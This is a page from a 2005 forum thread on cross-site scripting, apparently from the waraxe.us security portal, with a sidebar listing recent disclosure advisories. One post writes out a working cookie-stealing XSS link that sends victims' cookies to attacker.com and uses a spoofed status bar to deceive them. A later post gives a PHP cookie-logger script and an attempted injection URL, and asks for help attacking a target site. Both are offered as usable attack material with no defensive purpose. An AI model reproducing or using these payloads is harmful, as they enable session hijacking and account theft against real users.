 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 473
 Members: 0
 Total: 473
|
|
|
|
|
|
Full disclosure |
|
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 Posted: Mon Apr 18, 2005 3:36 am |
 |
|
| y3dips |
| Valuable expert |
 |
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
 |
|
 |
|
here the real scenario
server - victim - attacker
- server with vulnerable to XSS : <script>alert(document.cookie)</script>
- victim who access the URL that already poisoning with cookiesstealing URL (with social engginering)
for example :
<a href="http://server.com/index3a_page2.html?tw=<script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>" onMouseOver="window.status='http://www.securityyou.com/2002/SHOWBIZ/talkshow.reut/index.html';return true"onMouseOut="window.status='';return true"> Check this out!</a>
then when user click Check this Out link
they will redirect to attacker site with http://attacker.com/steal.cgi |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
h?llo |
|
| Posted: Tue Jun 28, 2005 4:19 pm |
|
|
| rsaman |
| Beginner |
 |
|
| Joined: Jun 28, 2005 |
| Posts: 1 |
|
|
|
|
|
|
|
HELLO ALL 
I have got a question !
What this message means ????
i haven't got access on cookies ???
| Quote: | Server Error in '/mps_id_sharing' Application.
--------------------------------------------------------------------------------
Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration>
Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
</system.web>
</configuration> |
it's correct or not ????
i use this scrypt ( tuto.php ) ===>
| Quote: | <?php
$test = $_GET['cookie'];
echo "cookie --> $test\n";
$fp = fopen('logger.txt','a'); // open to append
if(!$fp)
{
die('f**ck, can't open file to write!');
}
fwrite($fp, $_GET['cookie']."~~~~~~~~~"); // write the cookie information
fclose($fp);
?> |
for ex : my target is ===>http://www.host.com/index.php
my site is ===>http://www/mysite.com/myname/tuto.php
and i use this URL ????? ===>
i dont know if it write or wrong :s
| Quote: | | <script>http://www.host.com/index.php/http://myftp/me/tuto.php?cookie='+document.cookie;</Script> |
Can you help me please !!!! sorry for my bad english and for your help because I'm novice !!!!
thank's a lot |
|
_________________
Hello i´m french  |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 2
Goto page Previous1, 2
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
